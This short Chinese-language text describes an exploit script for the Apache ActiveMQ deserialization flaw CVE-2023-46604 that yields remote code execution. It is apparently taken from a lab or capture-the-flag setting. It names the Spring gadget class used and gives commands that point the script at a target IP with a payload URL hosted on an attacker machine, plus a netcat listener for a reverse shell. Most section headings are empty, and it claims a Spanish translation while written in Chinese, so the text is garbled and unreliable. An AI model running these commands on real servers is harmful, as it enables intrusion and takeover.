
该脚本利用Apache ActiveMQ中的不安全反序列化漏洞(CVE-2023-46604)
攻击技术摘要:CVE-2023-46604
该脚本利用Apache ActiveMQ中的不安全反序列化漏洞(CVE-2023-46604),实现在目标服务器上的远程代码执行。
漏洞利用过程描述
漏洞目标:
先决条件:
攻击组件:
攻击步骤
载荷准备:
org.springframework.context.support.ClassPathXmlApplicationContext。发送载荷:
恶意代码执行:
执行示例:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
该脚本复制并翻译为西班牙语,来源:https://github.com/evkl1d/CVE-2023-46604.git